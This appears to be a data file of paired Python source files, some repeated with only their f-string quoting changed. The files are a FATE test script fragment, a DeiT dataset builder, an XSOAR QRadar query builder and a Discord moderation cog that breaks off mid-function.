['component parameters', judging_state(test_api.component_api('component_parameters', max_iter=max_iter))])
component.add_row(['metrics', judging_state(test_api.component_api('component_metrics'))])
component.add_row(['metrics all', judging_state(test_api.component_api('component_metric_all'))])
model = PrettyTable()
model.set_style(ORGMODE)
model.field_names = ['model api name', 'status']
if not config_json.get('component_is_homo') and serving_connect_bool:
model_load_conf = get_dict_from_file(model_file_path)
model_load_conf["initiator"]["party_id"] = guest_party_id
model_load_conf["role"].update(
{"guest": [guest_party_id], "host": [host_party_id], "arbiter": [arbiter_party_id]})
model.add_row(['model load', judging_state(test_api.model_api('load', model_load_conf=model_load_conf))])
model.add_row(['model bind', judging_state(
test_api.model_api('bind', model_load_conf=model_load_conf, servings=config_json['serving_setting']))])
status, model_path = test_api.model_api('export')
model.add_row(['model export', judging_state(status)])
model.add_row(['model import', (judging_state(
test_api.model_api('import', remove_path=remove_path, model_path=model_path)))])
model.add_row(['model store', (judging_state(test_api.model_api('store')))])
model.add_row(['model restore', (judging_state(test_api.model_api('restore')))])
print(model.get_string(title="model api"))
component.add_row(['metrics delete', judging_state(test_api.component_api('component_metric_delete'))])
print(component.get_string(title="component api"))
test_api.submit_job()
test_api.submit_job()
test_api.submit_job()
job.add_row(['clean job', judging_state(test_api.job_api('clean_job'))])
job.add_row(['clean queue', judging_state(test_api.job_api('clean_queue'))])
print(job.get_string(title="job api"))
print('Please check the error content: {}'.format(test_api.error_log(None)))
|
# Copyright (c) 2015-present, Facebook, Inc.
# All rights reserved.
import os
import json
from torchvision import datasets, transforms
from torchvision.datasets.folder import ImageFolder, default_loader
from timm.data.constants import IMAGENET_DEFAULT_MEAN, IMAGENET_DEFAULT_STD
from timm.data import create_transform
class INatDataset(ImageFolder):
def __init__(self, root, train=True, year=2018, transform=None, target_transform=None,
category='name', loader=default_loader):
self.transform = transform
self.loader = loader
self.target_transform = target_transform
self.year = year
# assert category in ['kingdom','phylum','class','order','supercategory','family','genus','name']
path_json = os.path.join(root, f'{'train' if train else 'val'}{year}.json')
with open(path_json) as json_file:
data = json.load(json_file)
with open(os.path.join(root, 'categories.json')) as json_file:
data_catg = json.load(json_file)
path_json_for_targeter = os.path.join(root, f"train{year}.json")
with open(path_json_for_targeter) as json_file:
data_for_targeter = json.load(json_file)
targeter = {}
indexer = 0
for elem in data_for_targeter['annotations']:
king = []
king.append(data_catg[int(elem['category_id'])][category])
if king[0] not in targeter.keys():
targeter[king[0]] = indexer
indexer += 1
self.nb_classes = len(targeter)
self.samples = []
for elem in data['images']:
cut = elem['file_name'].split('/')
target_current = int(cut[2])
path_current = os.path.join(root, cut[0], cut[2], cut[3])
categors = data_catg[target_current]
target_current_true = targeter[categors[category]]
self.samples.append((path_current, target_current_true))
# __getitem__ and __len__ inherited from ImageFolder
def build_dataset(is_train, args):
transform = build_transform(is_train, args)
if args.data_set == 'CIFAR':
dataset = datasets.CIFAR100(args.data_path, train=is_train, transform=transform)
nb_classes = 100
elif args.data_set == 'IMNET':
root = os.path.join(args.data_path, 'train' if is_train else 'val')
dataset = datasets.ImageFolder(root, transform=transform)
nb_classes = 1000
elif args.data_set == 'INAT':
dataset = INatDataset(args.data_path, train=is_train, year=2018,
category=args.inat_category, transform=transform)
nb_classes = dataset.nb_classes
elif args.data_set == 'INAT19':
dataset = INatDataset(args.data_path, train=is_train, year=2019,
category=args.inat_category, transform=transform)
nb_classes = dataset.nb_classes
return dataset, nb_classes
def build_transform(is_train, args):
resize_im = args.input_size > 32
if is_train:
# this should always dispatch to transforms_imagenet_train
transform = create_transform(
input_size=args.input_size,
is_training=True,
color_jitter=args.color_jitter,
auto_augment=args.aa,
interpolation=args.train_interpolation,
re_prob=args.reprob,
re_mode=args.remode,
re_count=args.recount,
)
if not resize_im:
# replace RandomResizedCropAndInterpolation with
# RandomCrop
transform.transforms[0] = transforms.RandomCrop(
args.input_size, padding=4)
return transform
t = []
if resize_im:
size = int((256 / 224) * args.input_size)
t.append(
transforms.Resize(size, interpolation=3), # to maintain same ratio w.r.t. 224 images
)
t.append(transforms.CenterCrop(args.input_size))
t.append(transforms.ToTensor())
t.append(transforms.Normalize(IMAGENET_DEFAULT_MEAN, IMAGENET_DEFAULT_STD))
return transforms.Compose(t) | # Copyright (c) 2015-present, Facebook, Inc.
# All rights reserved.
import os
import json
from torchvision import datasets, transforms
from torchvision.datasets.folder import ImageFolder, default_loader
from timm.data.constants import IMAGENET_DEFAULT_MEAN, IMAGENET_DEFAULT_STD
from timm.data import create_transform
class INatDataset(ImageFolder):
def __init__(self, root, train=True, year=2018, transform=None, target_transform=None,
category='name', loader=default_loader):
self.transform = transform
self.loader = loader
self.target_transform = target_transform
self.year = year
# assert category in ['kingdom','phylum','class','order','supercategory','family','genus','name']
path_json = os.path.join(root, f'{"train" if train else "val"}{year}.json')
with open(path_json) as json_file:
data = json.load(json_file)
with open(os.path.join(root, 'categories.json')) as json_file:
data_catg = json.load(json_file)
path_json_for_targeter = os.path.join(root, f"train{year}.json")
with open(path_json_for_targeter) as json_file:
data_for_targeter = json.load(json_file)
targeter = {}
indexer = 0
for elem in data_for_targeter['annotations']:
king = []
king.append(data_catg[int(elem['category_id'])][category])
if king[0] not in targeter.keys():
targeter[king[0]] = indexer
indexer += 1
self.nb_classes = len(targeter)
self.samples = []
for elem in data['images']:
cut = elem['file_name'].split('/')
target_current = int(cut[2])
path_current = os.path.join(root, cut[0], cut[2], cut[3])
categors = data_catg[target_current]
target_current_true = targeter[categors[category]]
self.samples.append((path_current, target_current_true))
# __getitem__ and __len__ inherited from ImageFolder
def build_dataset(is_train, args):
transform = build_transform(is_train, args)
if args.data_set == 'CIFAR':
dataset = datasets.CIFAR100(args.data_path, train=is_train, transform=transform)
nb_classes = 100
elif args.data_set == 'IMNET':
root = os.path.join(args.data_path, 'train' if is_train else 'val')
dataset = datasets.ImageFolder(root, transform=transform)
nb_classes = 1000
elif args.data_set == 'INAT':
dataset = INatDataset(args.data_path, train=is_train, year=2018,
category=args.inat_category, transform=transform)
nb_classes = dataset.nb_classes
elif args.data_set == 'INAT19':
dataset = INatDataset(args.data_path, train=is_train, year=2019,
category=args.inat_category, transform=transform)
nb_classes = dataset.nb_classes
return dataset, nb_classes
def build_transform(is_train, args):
resize_im = args.input_size > 32
if is_train:
# this should always dispatch to transforms_imagenet_train
transform = create_transform(
input_size=args.input_size,
is_training=True,
color_jitter=args.color_jitter,
auto_augment=args.aa,
interpolation=args.train_interpolation,
re_prob=args.reprob,
re_mode=args.remode,
re_count=args.recount,
)
if not resize_im:
# replace RandomResizedCropAndInterpolation with
# RandomCrop
transform.transforms[0] = transforms.RandomCrop(
args.input_size, padding=4)
return transform
t = []
if resize_im:
size = int((256 / 224) * args.input_size)
t.append(
transforms.Resize(size, interpolation=3), # to maintain same ratio w.r.t. 224 images
)
t.append(transforms.CenterCrop(args.input_size))
t.append(transforms.ToTensor())
t.append(transforms.Normalize(IMAGENET_DEFAULT_MEAN, IMAGENET_DEFAULT_STD))
return transforms.Compose(t) |
import demistomock as demisto # noqa: F401
from CommonServerPython import * # noqa: F401
from enum import Enum
from typing import Dict, List
REPLACE_KEYS = [
('base_values_to_search', 'base_additional_values'),
('base_fields_to_search', 'base_additional_fields'),
('base_field_state', 'base_additional_field_state'),
('base_field_match', 'base_additional_field_match')
]
class SectionNotFound(Exception):
pass
class Operators(Enum):
OR = 'OR'
AND = 'AND'
class MatchRule(Enum):
EQUAL = "{} = '{}'"
NOT_EQUAL = "{} != '{}'"
ILIKE = "{} ILIKE '%{}%'"
NOT_ILIKE = "{} NOT ILIKE '%{}%'"
def fields_section(fields_list: List[str], values_list: List[str], operator: Operators = Operators.OR,
match_rule: MatchRule = MatchRule.EQUAL) -> str:
condition_list: List[str] = []
for field in map(lambda x: x if ' ' not in x else f"'{x}'", fields_list):
for value in values_list:
condition_list.append(match_rule.value.format(field, value))
return f"({f" {operator.value} ".join(condition_list)})"
def complete_query(select_fields: str, combined_sections: str, time_frame: str) -> str:
return f"select {select_fields} from events where {combined_sections} {time_frame}"
def prepare_section(args: Dict, section_prefix: str) -> Dict:
try:
values_list = argToList(args[f'{section_prefix}_additional_values'])
except KeyError:
raise SectionNotFound(section_prefix)
fields_list = args.get(f'{section_prefix}_additional_fields')
if args[f'{section_prefix}_additional_field_match'] == 'partial':
if args[f'{section_prefix}_additional_field_state'] == 'include':
match_rule = MatchRule.ILIKE
else:
match_rule = MatchRule.NOT_ILIKE
fields_list = fields_list or ['UTF8(payload)']
else:
if not fields_list:
raise KeyError(f'{section_prefix}_additional_fields')
if args[f'{section_prefix}_additional_field_state'] == 'include':
match_rule = MatchRule.EQUAL
else:
match_rule = MatchRule.NOT_EQUAL
return {
'values_list': values_list,
'match_rule': match_rule,
'fields_list': argToList(fields_list)
}
def prepare_args(args: Dict) -> Dict:
for key in list(args):
if not args[key]:
args.pop(key)
for original_key, new_key in REPLACE_KEYS:
try:
args[new_key] = args.pop(original_key)
except KeyError:
# ignore the key beacuse a part of them are not required and we already handeling the key errors in the main function
pass
return args
def original_key_name(key_name) -> str:
for original_key, new_key in REPLACE_KEYS:
if key_name == new_key:
return original_key
return key_name
def create_sections_str(args: Dict[str, str], operator: Operators = Operators.AND) -> str:
sections = []
for section_prefix in ['base', 'first', 'second']:
try:
sections.append(fields_section(**prepare_section(args, section_prefix)))
except SectionNotFound:
if section_prefix == 'base':
raise DemistoException('base arguments not given correctly')
return f' {operator.value} '.join(sections)
def main():
try:
args = prepare_args(demisto.args())
time_frame = args['time_frame']
select_fields = args['select_fields']
aql_string = complete_query(
select_fields=select_fields,
combined_sections=create_sections_str(args),
time_frame=time_frame,
)
return_results(CommandResults(readable_output=aql_string, outputs={'QRadarQuery': aql_string}))
except KeyError as key_error:
key_name = original_key_name(key_error.args[0])
return_error(f'Missing {key_name}.')
except Exception as error:
return_error(str(error), error)
if __name__ in ('__main__', '__builtin__', 'builtins'):
main()
| import demistomock as demisto # noqa: F401
from CommonServerPython import * # noqa: F401
from enum import Enum
from typing import Dict, List
REPLACE_KEYS = [
('base_values_to_search', 'base_additional_values'),
('base_fields_to_search', 'base_additional_fields'),
('base_field_state', 'base_additional_field_state'),
('base_field_match', 'base_additional_field_match')
]
class SectionNotFound(Exception):
pass
class Operators(Enum):
OR = 'OR'
AND = 'AND'
class MatchRule(Enum):
EQUAL = "{} = '{}'"
NOT_EQUAL = "{} != '{}'"
ILIKE = "{} ILIKE '%{}%'"
NOT_ILIKE = "{} NOT ILIKE '%{}%'"
def fields_section(fields_list: List[str], values_list: List[str], operator: Operators = Operators.OR,
match_rule: MatchRule = MatchRule.EQUAL) -> str:
condition_list: List[str] = []
for field in map(lambda x: x if ' ' not in x else f"'{x}'", fields_list):
for value in values_list:
condition_list.append(match_rule.value.format(field, value))
return f"({f' {operator.value} '.join(condition_list)})"
def complete_query(select_fields: str, combined_sections: str, time_frame: str) -> str:
return f"select {select_fields} from events where {combined_sections} {time_frame}"
def prepare_section(args: Dict, section_prefix: str) -> Dict:
try:
values_list = argToList(args[f'{section_prefix}_additional_values'])
except KeyError:
raise SectionNotFound(section_prefix)
fields_list = args.get(f'{section_prefix}_additional_fields')
if args[f'{section_prefix}_additional_field_match'] == 'partial':
if args[f'{section_prefix}_additional_field_state'] == 'include':
match_rule = MatchRule.ILIKE
else:
match_rule = MatchRule.NOT_ILIKE
fields_list = fields_list or ['UTF8(payload)']
else:
if not fields_list:
raise KeyError(f'{section_prefix}_additional_fields')
if args[f'{section_prefix}_additional_field_state'] == 'include':
match_rule = MatchRule.EQUAL
else:
match_rule = MatchRule.NOT_EQUAL
return {
'values_list': values_list,
'match_rule': match_rule,
'fields_list': argToList(fields_list)
}
def prepare_args(args: Dict) -> Dict:
for key in list(args):
if not args[key]:
args.pop(key)
for original_key, new_key in REPLACE_KEYS:
try:
args[new_key] = args.pop(original_key)
except KeyError:
# ignore the key beacuse a part of them are not required and we already handeling the key errors in the main function
pass
return args
def original_key_name(key_name) -> str:
for original_key, new_key in REPLACE_KEYS:
if key_name == new_key:
return original_key
return key_name
def create_sections_str(args: Dict[str, str], operator: Operators = Operators.AND) -> str:
sections = []
for section_prefix in ['base', 'first', 'second']:
try:
sections.append(fields_section(**prepare_section(args, section_prefix)))
except SectionNotFound:
if section_prefix == 'base':
raise DemistoException('base arguments not given correctly')
return f' {operator.value} '.join(sections)
def main():
try:
args = prepare_args(demisto.args())
time_frame = args['time_frame']
select_fields = args['select_fields']
aql_string = complete_query(
select_fields=select_fields,
combined_sections=create_sections_str(args),
time_frame=time_frame,
)
return_results(CommandResults(readable_output=aql_string, outputs={'QRadarQuery': aql_string}))
except KeyError as key_error:
key_name = original_key_name(key_error.args[0])
return_error(f'Missing {key_name}.')
except Exception as error:
return_error(str(error), error)
if __name__ in ('__main__', '__builtin__', 'builtins'):
main()
|
import datetime
import discord
import re
import time
from discord.ext import commands
from subprocess import call
from typing import Union
from utils import utils, crud, models
from utils.checks import is_staff, check_staff_id, check_bot_or_staff
class Mod(commands.Cog):
"""
Staff commands.
"""
def __init__(self, bot):
self.bot = bot
@is_staff("Owner")
@commands.command()
async def quit(self, ctx):
"""Stops the bot."""
await ctx.send("👋 Bye bye!")
await self.bot.close()
@is_staff("SuperOP")
@commands.command()
async def pull(self, ctx):
"""Pull new changes from GitHub and restart."""
if self.bot.IS_DOCKER:
await ctx.send("Pull isn't used when running from a Docker container!")
return
else:
await ctx.send("Pulling changes...")
call(['git', 'pull'])
await ctx.send("👋 Restarting bot!")
await self.bot.close()
@is_staff("Helper")
@commands.guild_only()
@commands.command(aliases=['ui'])
async def userinfo(self, ctx, u: Union[discord.Member, discord.User]):
"""Shows information from a user. Staff and Helpers only."""
basemsg = f"name = {u.name}\nid = {u.id}\ndiscriminator = {u.discriminator}\navatar = {u.avatar}\nbot = {u.bot}\navatar_url = {u.avatar_url_as(static_format="png")}\ndefault_avatar= {u.default_avatar}\ndefault_avatar_url = <{u.default_avatar_url}>\ncreated_at = {u.created_at}\n"
if isinstance(u, discord.Member):
role = u.top_role.name
await ctx.send(f"{basemsg}display_name = {u.display_name}\njoined_at = {u.joined_at}\nstatus ={u.status}\nactivity = {u.activity.name if u.activity else None}\ncolour = {u.colour}\ntop_role = {role}\n")
else:
try:
ban = await ctx.guild.fetch_ban(u)
except discord.NotFound: # NotFound is raised if the user isn't banned
ban = None
await ctx.send(f"{basemsg}{f"**Banned**, reason: {ban.reason}" if ban is not None else ""}\n")
@commands.guild_only()
@commands.command(aliases=['ui2'])
async def userinfo2(self, ctx, user: Union[discord.Member, discord.User] = None):
"""Shows information from a user. Staff and Helpers only."""
if user is None:
user = ctx.author
if (not await check_staff_id('Helper', ctx.author.id)) and (ctx.author != user or ctx.channel != self.bot.channels['bot-cmds']):
await ctx.message.delete()
return await ctx.send(f"{ctx.author.mention} This command can only be used in {self.bot.channels["bot-cmds"].mention} and only on yourself.", delete_after=10)
embed = discord.Embed(color=utils.gen_color(user.id))
embed.description = (
f"**User:** {user.mention}\n"
f"**User's ID:** {user.id}\n"
f"**Created on:** {user.created_at}\n"
f"**Default Profile Picture:** {user.default_avatar}\n"
)
if isinstance(user, discord.Member):
member_type = "member"
embed.description += (
f"**Join date:** {user.joined_at}\n"
f"**Current Status:** {user.status}\n"
f"**User Activity:** {user.activity}\n"
f"**Current Display Name:** {user.display_name}\n"
f"**Nitro Boost Info:** {user.premium_since}\n"
f"**Current Top Role:** {user.top_role}\n"
f"**Color:** {user.color}\n"
)
else:
member_type = "user"
try:
ban = await ctx.guild.fetch_ban(user)
embed.description += f"\n**Banned**, reason: {ban.reason}"
except discord.NotFound:
pass
member_type = member_type if not user.bot else "bot"
embed.title = f"**Userinfo for {member_type} {user}**"
embed.set_thumbnail(url=str(user.avatar_url_as(static_format='png')))
await ctx.send(embed=embed)
@is_staff("HalfOP")
@commands.guild_only()
@commands.command()
async def matchuser(self, ctx, *, rgx: str):
"""Match users by regex."""
author = ctx.author
msg = "```\nmembers:\n"
for m in self.bot.guild.members:
if bool(re.search(rgx, m.name, re.IGNORECASE)):
msg += f"{m.id} - {m}\n"
msg += "```"
if len(msg) > 4000:
for page in utils.paginate_message(msg).pages:
await author.send(page)
else:
await author.send(msg)
@is_staff("Owner")
@commands.guild_only()
@commands.command(aliases=['gigayeet'])
async def multiban(self, ctx, users: commands.Greedy[int]):
"""Multi-ban users."""
author = ctx.author
msg = "```\nfailed:\n"
for m in users:
try:
await self.bot.guild.ban(discord.Object(id=m))
except (discord.errors.NotFound, discord.errors.Forbidden) as e:
msg += f"{m}:\n {e.text}\n"
pass
msg += "```"
await utils.send_dm_message(author, msg)
@is_staff("Owner")
@commands.guild_only()
@commands.bot_has_permissions(ban_members=True)
@commands.command(aliases=['gigayeetre'])
async def multibanre(self, ctx, *, rgx: str):
"""Multi-ban users by regex."""
author = ctx.author
msg = "```\nbanned:\n"
toban = [] # because "dictionary changed size during iteration"
for m in self.bot.guild.members:
if bool(re.search(rgx, m.name, re.IGNORECASE)):
msg += f"{m.id} - {m}\n"
toban.append(m)
for m in toban:
try:
await m.ban()
except discord.errors.NotFound:
pass
msg += "```"
await utils.send_dm_message(author, msg)
@is_staff("Helper")
@commands.bot_has_permissions(manage_channels=True)
@commands.guild_only()
@commands.command()
async def slowmode(self, ctx, time, channel: discord.TextChannel = None):
"""Apply a given slowmode time to a channel.
The time format is identical to that used for timed kicks/bans/takehelps.
It is not possible to set a slowmode longer than 6 hours.
Helpers in assistance channels and Staff only."""
if not channel:
channel = ctx.channel
if channel not in self.bot.assistance_channels and not await check_staff_id("OP", ctx.author.id):
return await ctx.send("You cannot use this command outside of assistance channels.")
if (seconds := utils.parse_time(time)) == -1:
return await ctx.send("💢 I don't understand your time format.")
if seconds > 21600:
return await ctx.send("💢 You can't slowmode a channel for longer than 6 hours!")
try:
await channel.edit(slowmode_delay=seconds)
await ctx.send(f"Slowmode delay for {channel.mention} is now {time} ({seconds}).")
except discord.errors.Forbidden:
return await ctx.send("💢 I don't have permission to do this.")
msg = f"🕙 **Slowmode**: {ctx.author.mention} set a slowmode delay of {time} ({seconds}) in {channel.mention}"
await self.bot.channels["mod-logs"].send(msg)
@is_staff("Helper")
@commands.has_permissions(manage_messages=True)
@commands.guild_only()
@commands.command(aliases=["clear"])
async def purge(self, ctx, limit: int):
"""Clears a given number of messages. Helpers in assistance channels and Staff only."""
deleted = await ctx.channel.purge(limit=limit + 1, check=lambda message: not message.pinned)
msg = f"🗑 **Cleared**: {ctx.author.mention} cleared {len(deleted)} messages in {ctx.channel.mention}"
await self.bot.channels['mod-logs'].send(msg)
@is_staff("HalfOP")
@commands.guild_only()
@commands.command()
async def metamute(self, ctx, member: discord.Member, *, reason=""):
"""Mutes a user so they can't speak in meta. Staff only."""
if not await crud.add_permanent_role(member.id, self.bot.roles['meta-mute'].id):
await ctx.send("User is already meta muted!")
return
await member.add_roles(self.bot.roles['meta-mute'])
msg_user = "You were meta muted!"
if reason != "":
msg_user += " The given reason is: " + reason
await utils.send_dm_message(member, msg_user, ctx)
await ctx.send(f"{member.mention} can no longer speak in meta.")
msg = f"🔇 **Meta muted**: {ctx.author.mention} meta muted {member.mention} | {self.bot.escape_text(member)}"
signature = utils.command_signature(ctx.command)
if reason != "":
msg += "\n✏️ __Reason__: " + reason
else:
msg += f"\nPlease add an explanation below. In the future, it is recommended to use `{signature}` as the reason is automatically sent to the user."
await self.bot.channels['mod-logs'].send(msg)
@is_staff("HalfOP")
@commands.guild_only()
@commands.bot_has_permissions(manage_roles=True)
@commands.command()
async def metaunmute(self, ctx, member: discord.Member):
"""Unmutes a user so they can speak in meta. Staff only."""
try:
if not await crud.remove_permanent_role(member.id, self.bot.roles["meta-mute"].id) and self.bot.roles['meta-mute'] not in member.roles:
return await ctx.send("This user is not meta muted!")
await member.remove_roles(self.bot.roles['meta-mute'])
await ctx.send(f"{member.mention} can now speak in meta again.")
msg = f"🔈 **Meta unmuted**: {ctx.author.mention} meta unmuted {member.mention} | {self.bot.escape_text(member)}"
await self.bot.channels['mod-logs'].send(msg)
except discord.errors.Forbidden:
await ctx.send("💢 I don't have permission to do this.")
@is_staff("HalfOP")
@commands.guild_only()
@commands.bot_has_permissions(manage_roles=True)
@commands.command()
async def mute(self, ctx, member: discord.Member, *, reason=""):
"""Mutes a user so they can't speak. Staff only."""
if await check_bot_or_staff(ctx, member, "mute"):
return
if not await crud.add_permanent_role(member.id, self.bot.roles['Muted'].id):
# Check if the user has a timed restriction.
# If there is one, this will convert it to a permanent one.
# If not, it will display that it was already taken.
if not await crud.get_time_restrictions_by_user_type(member.id, 'timemute'):
return await ctx.send("User is already muted!")
else:
await crud.remove_timed_restriction(member.id, 'timemute')
await member.add_roles(self.bot.roles['Muted'])
await member.remove_roles(self.bot.roles['#elsewhere'], self.bot.roles['#art-discussion'])
msg_user = "You were muted!"
if reason != "":
msg_user += " The given reason is: " + reason
await utils.send_dm_message(member, msg_user, ctx)
await ctx.send(f"{member.mention} can no longer speak.")
msg = f"🔇 **Muted**: {ctx.author.mention} muted {member.mention} | {self.bot.escape_text(member)}"
if reason != "":
msg += "\n✏️ __Reason__: " + reason
else:
signature = utils.command_signature(ctx.command)
msg += f"\nPlease add an explanation below. In the future, it is recommended to use `{signature}` as the reason is automatically sent to the user."
await self.bot.channels['mod-logs'].send(msg)
# change to permanent mute
@is_staff("HalfOP")
@commands.bot_has_permissions(manage_roles=True)
@commands.guild_only()
@commands.command()
async def timemute(self, ctx, member: discord.Member, length, *, reason=""):
"""Mutes a user for a limited period of time so they can't speak. Staff only.\n\nLength format: #d#h#m#s"""
if await check_bot_or_staff(ctx, member, "mute"):
return
await member.add_roles(self.bot.roles['Muted'])
await member.remove_roles(self.bot.roles['#elsewhere'], self.bot.roles['#art-discussion'])
issuer = ctx.author
if (seconds := utils.parse_time(length)) == -1:
return await ctx.send("💢 I don't understand your time format.")
timestamp = datetime.datetime.now()
delta = datetime.timedelta(seconds=seconds)
unmute_time = timestamp + delta
unmute_time_string = unmute_time.strftime("%Y-%m-%d %H:%M:%S")
old_timestamp = await crud.add_timed_restriction(member.id, unmute_time, 'timemute')
await crud.add_permanent_role(member.id, self.bot.roles['Muted'].id)
msg_user = "You were muted!"
if reason != "":
msg_user += " The given reason is: " + reason
msg_user += f"\n\nThis mute expires {unmute_time_string} {time.tzname[0]}."
await utils.send_dm_message(member, msg_user, ctx)
signature = utils.command_signature(ctx.command)
if not old_timestamp:
await ctx.send(f"{member.mention} can no longer speak.")
msg = f"🔇 **Timed mute**: {issuer.mention} muted {member.mention}| {self.bot.escape_text(member)} for {delta}, until {unmute_time_string} "
else:
await ctx.send(f"{member.mention} mute was updated.")
msg = f"🔇 **Timed mute**: {issuer.mention} updated {member.mention}| {self.bot.escape_text(member)} time mute from {old_timestamp} until {unmute_time_string}"
if reason != "":
msg += "\n✏️ __Reason__: " + reason
else:
msg += f"\nPlease add an explanation below. In the future, it is recommended to use `{signature}` as the reason is automatically sent to the user."
await self.bot.channels['mod-logs'].send(msg)
@is_staff("HalfOP")
@commands.guild_only()
@commands.command()
async def unmute(self, ctx, member: discord.Member):
"""Unmutes a user so they can speak. Staff only."""
try:
if not await crud.remove_permanent_role(member.id, self.bot.roles["Muted"].id):
return await ctx.send("This user is not muted")
await member.remove_roles(self.bot.roles['Muted'])
await ctx.send(f"{member.mention} can now speak again.")
msg = f"🔈 **Unmuted**: {ctx.author.mention} unmuted {member.mention} | {self.bot.escape_text(member)}"
await self.bot.channels['mod-logs'].send(msg)
await crud.remove_timed_restriction(member.id, 'timemute')
except discord.errors.Forbidden:
await ctx.send("💢 I don't have permission to do this.")
@is_staff("HalfOP")
@commands.command()
async def art(self, ctx, member: discord.Member):
"""Restore art-discussion access for a user. Staff only."""
if not await crud.remove_permanent_role(member.id, self.bot.roles['No-art'].id):
return await ctx.send("This user is not restricted from art channels.")
try:
await member.remove_roles(self.bot.roles['No-art'])
except discord.Forbidden:
await ctx.send("💢 I don't have permission to do this.")
await ctx.send(f"{member.mention} can access art-discussion again.")
msg = f"⭕️ **Restored art**: {ctx.message.author.mention} restored art access to {member.mention} | {self.bot.escape_text(member)}"
await self.bot.channels['mod-logs'].send(msg)
@is_staff("HalfOP")
@commands.command()
async def noart(self, ctx, member: discord.Member, *, reason=""):
"""Removes art-discussion access from a user. Staff only."""
if not await crud.add_permanent_role(member.id, self.bot.roles['No-art'].id):
return await ctx.send("This user is already restricted from art channels.")
try:
await member.add_roles(self.bot.roles['No-art'])
except discord.Forbidden:
await ctx.send("💢 I don't have permission to do this.")
await ctx.send(f"{member.mention} can no longer access art-discussion.")
msg = f"🚫 **Removed art**: {ctx.message.author.mention} removed art access from {member.mention} | {self.bot.escape_text(member)}"
signature = utils.command_signature(ctx.command)
if reason != "":
msg += "\n✏️ __Reason__: " + reason
else:
msg += f"\nPlease add an explanation below. In the future, it is recommended to use `{signature}` as the reason is automatically sent to the user."
await self.bot.channels['mod-logs'].send(msg)
@is_staff("HalfOP")
@commands.guild_only()
@commands.command()
async def elsewhere(self, ctx, member: discord.Member):
"""Restore elsewhere access for a user. Staff only."""
try:
if not await crud.remove_permanent_role(member.id, self.bot.roles["No-elsewhere"].id):
return await ctx.send("This user is not restricted from elsewhere!")
await member.remove_roles(self.bot.roles['No-elsewhere'])
await ctx.send(f"{member.mention} can access elsewhere again.")
msg = f"⭕️ **Restored elsewhere**: {ctx.author.mention} restored elsewhere access to {member.mention} | {self.bot.escape_text(member)}"
await self.bot.channels['mod-logs'].send(msg)
except discord.errors.Forbidden:
await ctx.send("💢 I don't have permission to do this.")
@is_staff("HalfOP")
@commands.guild_only()
@commands.command()
async def noelsewhere(self, ctx, member: discord.Member, *, reason=""):
"""Removes elsewhere access from a user. Staff only."""
try:
if not await crud.add_permanent_role(member.id, self.bot.roles['No-elsewhere'].id):
return await ctx.send("This user is already restricted from elsewhere!")
await member.add_roles(self.bot.roles['No-elsewhere'])
await member.remove_roles(self.bot.roles['#elsewhere'])
await ctx.send(f"{member.mention} can no longer access elsewhere.")
msg = f"🚫 **Removed elsewhere**: {ctx.author.mention} removed elsewhere access from {member.mention} | {self.bot.escape_text(member)}"
signature = utils.command_signature(ctx.command)
if reason != "":
msg += "\n✏️ __Reason__: " + reason
else:
msg += f"\nPlease add an explanation below. In the future, it is recommended to use `{signature}` as the reason is automatically sent to the user."
await self.bot.channels['mod-logs'].send(msg)
except discord.errors.Forbidden:
await ctx.send("💢 I don't have permission to do this.")
@is_staff("HalfOP")
@commands.guild_only()
@commands.command()
async def noembed(self, ctx, member: discord.Member, *, reason=""):
"""Removes embed permissions from a user. Staff only."""
if await check_bot_or_staff(ctx, member, "noembed"):
return
try:
await crud.add_permanent_role(member.id, self.bot.roles['No-Embed'].id)
await member.add_roles(self.bot.roles['No-Embed'])
msg_user = "You lost embed and upload permissions!"
if reason != "":
msg_user += " The given reason is: " + reason
msg_user += "\n\nIf you feel this was unjustified, you may appeal in <#270890866820775946>."
await utils.send_dm_message(member, msg_user, ctx)
await ctx.send(f"{member.mention} can no longer embed links or attach files.")
msg = f"🚫 **Removed Embed**: {ctx.author.mention} removed embed from {member.mention} | {self.bot.escape_text(member)}"
signature = utils.command_signature(ctx.command)
if reason != "":
msg += "\n✏️ __Reason__: " + reason
else:
msg += f"\nPlease add an explanation below. In the future, it is recommended to use `{signature}` as the reason is automatically sent to the user."
await self.bot.channels['mod-logs'].send(msg)
except discord.errors.Forbidden:
await ctx.send("💢 I don't have permission to do this.")
@is_staff("HalfOP")
@commands.guild_only()
@commands.command()
async def embed(self, ctx, member: discord.Member):
"""Restore embed permissions for a user. Staff only."""
try:
await crud.remove_permanent_role(member.id, self.bot.roles["No-Embed"].id)
await member.remove_roles(self.bot.roles['No-Embed'])
await ctx.send(f"{member.mention} can now embed links and attach files again.")
msg = f"⭕️ **Restored Embed**: {ctx.author.mention} restored embed to {member.mention} | {self.bot.escape_text(member)}"
await self.bot.channels['mod-logs'].send(msg)
except discord.errors.Forbidden:
await ctx.send("💢 I don't have permission to do this.")
@is_staff("Helper")
@commands.guild_only()
@commands.command(aliases=["nohelp", "yesnthelp"])
async def takehelp(self, ctx, member: Union[discord.Member, discord.User], *, reason=""):
"""Remove access to the assistance channels. Staff and Helpers only."""
if await check_bot_or_staff(ctx, member, "takehelp"):
return
if not await crud.add_permanent_role(member.id, self.bot.roles['No-Help'].id):
# Check if the user has a timed restriction.
# If there is one, this will convert it to a permanent one.
# If not, it will display that it was already taken.
if not await crud.get_time_restrictions_by_user_type(member.id, 'timenohelp'):
return await ctx.send("This user's help is already taken!")
else:
await crud.remove_timed_restriction(member.id, 'timenohelp')
msg_user = "You lost access to help channels!"
if isinstance(member, discord.Member):
await member.add_roles(self.bot.roles['No-Help'])
if reason != "":
msg_user += " The given reason is: " + reason
msg_user += "\n\nIf you feel this was unjustified, you may appeal in <#270890866820775946>."
await utils.send_dm_message(member, msg_user, ctx)
await ctx.send(f"{member.mention} can no longer access the help channels.")
msg = f"🚫 **Help access removed**: {ctx.author.mention} removed access to help channels from {member.mention} | {self.bot.escape_text(member)}"
signature = utils.command_signature(ctx.command)
if reason != "":
msg += "\n✏️ __Reason__: " + reason
else:
msg += f"\nPlease add an explanation below. In the future, it is recommended to use `{signature}` as the reason is automatically sent to the user."
await self.bot.channels['mod-logs'].send(msg)
@is_staff("Helper")
@commands.guild_only()
@commands.command(aliases=["yeshelp"])
async def givehelp(self, ctx, member: Union[discord.Member, discord.User]):
"""Restore access to the assistance channels. Staff and Helpers only."""
if not await crud.remove_permanent_role(member.id, self.bot.roles["No-Help"].id):
return await ctx.send("This user is not take-helped!")
if isinstance(member, discord.Member):
try:
await member.remove_roles(self.bot.roles['No-Help'])
except discord.errors.Forbidden:
